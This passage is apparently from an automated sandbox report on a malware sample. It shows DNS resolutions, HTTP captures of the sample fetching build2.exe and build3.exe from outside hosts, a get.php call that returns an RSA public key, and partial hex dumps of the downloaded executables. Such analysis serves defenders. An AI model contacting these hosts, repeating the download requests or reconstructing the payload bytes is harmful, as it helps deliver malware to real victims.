                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com189.232.19.193A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com152.231.127.122A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.13.174.91A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com181.91.106.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com63.143.98.185A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com181.91.106.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com152.231.127.122A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.13.174.91A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com189.232.19.193A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:14.344806910 CEST1.1.1.1192.168.2.70x4c80No error (0)steamcommunity.com23.65.44.84A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • api.2ip.ua
                                                                                                                                      • steamcommunity.com
                                                                                                                                      • 95.217.9.149
                                                                                                                                      • sdfjhuz.com
                                                                                                                                      • cajgtus.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.749702211.181.24.132805784C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 14:42:10.980226040 CEST91OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: sdfjhuz.com
                                                                                                                                      Apr 24, 2024 14:42:11.449896097 CEST1289INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:11 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 296448
                                                                                                                                      Last-Modified: Tue, 23 Apr 2024 19:19:16 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "662809b4-48600"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 0c 25
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$oPQ#?)Uk?)nRichPELGc0`m@@0ajd@`f8@`@.text `.rdataPtv@@.data^6`@.rsrcf@`@@%
                                                                                                                                      Apr 24, 2024 14:42:11.449922085 CEST1289INData Raw: a0 01 e8 4e 02 00 00 68 09 f4 40 00 e8 3f 26 00 00 59 c3 b9 14 25 a0 01 e8 a1 02 00 00 68 ff f3 40 00 e8 29 26 00 00 59 c3 b9 00 25 a0 01 e8 f8 02 00 00 68 f5 f3 40 00 e8 13 26 00 00 59 c3 6a 00 b9 08 25 a0 01 e8 ee 00 00 00 c3 6a 00 b9 fc 24 a0
                                                                                                                                      Data Ascii: Nh@?&Y%h@)&Y%h@&Yj%j$j%j%UQQQQ$!]EYY]UVEP,A^],ANUVEtV%Y^]UE]UE8
                                                                                                                                      Apr 24, 2024 14:42:11.748003006 CEST1289INData Raw: 15 34 00 41 00 53 8d 85 b4 fb ff ff 50 53 ff 15 90 00 41 00 8d 45 c8 50 53 8d 45 b4 50 53 ff 15 88 00 41 00 53 53 53 53 53 53 53 ff 15 44 00 41 00 8b 45 f8 8b 0d f0 24 a0 01 2b f8 83 f9 0c 75 07 53 ff 15 80 00 41 00 8b c7 c1 e0 04 89 45 f4 8b 45
                                                                                                                                      Data Ascii: 4ASPSAEPSEPSASSSSSSSDAE$+uSAEEEMUEEEEM3U3UME)ENt]MuE~_^[]V5$W=tNu_^UQeEE]UQQh^A
                                                                                                                                      Apr 24, 2024 14:42:11.748045921 CEST1289INData Raw: 44 53 f7 65 ec 8b 45 ec 81 6d fc f0 06 bd 57 81 6d cc f5 90 30 07 81 6d dc 7b e3 2f 6b 33 ff 81 3d f0 24 a0 01 00 04 00 00 75 57 57 57 57 ff 15 94 00 41 00 57 57 57 57 ff 15 60 00 41 00 57 ff 15 4c 00 41 00 57 57 57 57 ff 15 70 00 41 00 57 57 57
                                                                                                                                      Data Ascii: DSeEmWm0m{/k3=$uWWWWAWWWW`AWLAWWWWpAWWWWAWW"WW"WWA8q Fr|WtA{+F||AW<AW8AX~}5EzuFT|tA$h
                                                                                                                                      Apr 24, 2024 14:42:11.748059988 CEST1289INData Raw: 45 fc 02 50 e8 54 fd ff ff 8b c8 e8 98 00 00 00 89 45 e8 b8 37 1f 40 00 c3 83 4d fc ff 8b 7d e4 8b 75 e0 8b 5d e8 83 7d 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 aa f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57
                                                                                                                                      Data Ascii: EPTE7@M}u]}vuPSjjEPWEPluwM_^d[]Mjj`jjH"UuY]U]UM.]UVM/UP'^]3
                                                                                                                                      Apr 24, 2024 14:42:11.748140097 CEST1289INData Raw: 6f 0e 83 e9 10 8d 76 10 66 0f 7f 0f 8d 7f 10 eb e8 0f ba e1 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e1 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 98 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03
                                                                                                                                      Data Ascii: ovfsvs~vf%@ur*$%@r$$@$%@$,%@$@$@%@#FGFGr$%@I#FGr$%@#
                                                                                                                                      Apr 24, 2024 14:42:12.046922922 CEST1289INData Raw: ec 2c a1 a4 87 41 00 33 c5 89 45 fc 8b 45 08 8d 4d d4 53 56 8b 75 0c 57 ff 75 10 89 45 ec 8b 45 14 89 45 e4 e8 4b ff ff ff 8d 45 d4 33 ff 50 57 57 57 57 56 8d 45 e8 50 8d 45 f0 50 e8 f3 29 00 00 8b d8 83 c4 20 8b 45 e4 85 c0 74 05 8b 4d e8 89 08
                                                                                                                                      Data Ascii: ,A3EEMSVuWuEEEKE3PWWWWVEPEP) EtMuEPd$YYutujutj_}tMapM_^3["]U(A3ESVuMWu}E3PSSSSVEPEPX)EEWPg(E
                                                                                                                                      Apr 24, 2024 14:42:12.046966076 CEST1289INData Raw: 2e 40 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 18 2f 40 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 18 2f 40 00
                                                                                                                                      Data Ascii: .@#FGFGr$/@I#FGr$/@#r$/@I/@.@.@.@.@.@.@.@DDDDDDDDDDDDDD$/@(/@0/@</@P/@D$
                                                                                                                                      Apr 24, 2024 14:42:12.047017097 CEST1289INData Raw: 85 47 3c 00 00 ba 12 00 00 00 8d 0d 00 80 41 00 e8 40 3d 00 00 5a c3 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 b4 b5 43 00 ff 15 b0 00 41 00 85 c0 75 18 56 e8 a7 36 00 00 8b f0 ff 15 ac 00 41 00 50 e8 ac 36 00 00 59 89 06 5e 5d c3 cc cc cc
                                                                                                                                      Data Ascii: G<A@=ZU}t-uj5CAuV6AP6Y^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W|$
                                                                                                                                      Apr 24, 2024 14:42:12.047081947 CEST1289INData Raw: 5e 01 00 00 8d 8d fc ef ff ff 85 ff 74 33 8b d1 03 d0 4f 3b ca 73 2a 8a 01 3c 0d 75 13 8d 42 ff 3b c8 73 18 8d 41 01 80 38 0a 75 10 8b c8 eb 0c 0f b6 c0 0f be 80 f0 8c 41 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b
                                                                                                                                      Data Ascii: ^t3O;s*<uB;sA8uAAu+1rCDt:uGB;ru .u619Xu+ppjC[D
                                                                                                                                      Apr 24, 2024 14:42:12.047103882 CEST1289INData Raw: 08 e8 c1 ff ff ff 59 ff 75 08 ff 15 c0 00 41 00 cc 55 8b ec e8 bc 53 00 00 ff 75 08 e8 11 54 00 00 59 68 ff 00 00 00 e8 a3 00 00 00 cc 6a 01 6a 01 6a 00 e8 4d 01 00 00 83 c4 0c c3 6a 01 6a 00 6a 00 e8 3e 01 00 00 83 c4 0c c3 55 8b ec 83 3d b0 10
                                                                                                                                      Data Ascii: YuAUSuTYhjjjMjjj>U=AthAUYtuAYVhAhAYYuCh@k$AhAv=5YYth5UYtjjj53]Ujju]VjAVW


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.749703189.232.19.193805784C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 14:42:11.004527092 CEST139OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: cajgtus.com
                                                                                                                                      Apr 24, 2024 14:42:11.787678957 CEST764INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:30 GMT
                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                      Content-Length: 560
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a 6b 46 49 68 69 6d 71 74 62 53 2b 48 62 7a 70 4a 42 34 64 6e 49 46 5c 2f 54 44 39 69 4e 6d 46 57 4a 77 6a 79 41 6a 61 4a 6a 66 64 56 31 6e 70 6c 6c 6c 6c 59 4c 4b 5c 5c 6e 33 6c 48 74 34 71 52 56 64 55 66 4a 42 6e 30 70 75 7a 48 42 32 31 38 66 7a 64 67 63 69 76 4f 75 76 78 7a 72 42 52 39 7a 6d 38 76 6a 34 35 48 6d 64 71 75 50 51 76 35 54 38 61 62 59 47 59 49 6e 5c 5c 6e 58 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 74 70 38 71 6a 36 38 69 51 77 65 64 4a 55 69 78 44 63 6e 51 45 70 66 46 5a 7a 69 63 78 6d 62 6d 6d 64 79 37 74 4a 79 54 22 7d
                                                                                                                                      Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.749704189.232.19.193806348C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 14:42:11.004642010 CEST128OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: cajgtus.com
                                                                                                                                      Apr 24, 2024 14:42:11.756825924 CEST764INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:30 GMT
                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                      Content-Length: 560
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a 6b 46 49 68 69 6d 71 74 62 53 2b 48 62 7a 70 4a 42 34 64 6e 49 46 5c 2f 54 44 39 69 4e 6d 46 57 4a 77 6a 79 41 6a 61 4a 6a 66 64 56 31 6e 70 6c 6c 6c 6c 59 4c 4b 5c 5c 6e 33 6c 48 74 34 71 52 56 64 55 66 4a 42 6e 30 70 75 7a 48 42 32 31 38 66 7a 64 67 63 69 76 4f 75 76 78 7a 72 42 52 39 7a 6d 38 76 6a 34 35 48 6d 64 71 75 50 51 76 35 54 38 61 62 59 47 59 49 6e 5c 5c 6e 58 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 74 70 38 71 6a 36 38 69 51 77 65 64 4a 55 69 78 44 63 6e 51 45 70 66 46 5a 7a 69 63 78 6d 62 6d 6d 64 79 37 74 4a 79 54 22 7d
                                                                                                                                      Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.749705189.232.19.193805784C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 14:42:14.071400881 CEST96OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: cajgtus.com
                                                                                                                                      Apr 24, 2024 14:42:14.818780899 CEST1289INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:33 GMT
                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                      Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
                                                                                                                                      ETag: "4ae00-6074de5a4a562"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 306688
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 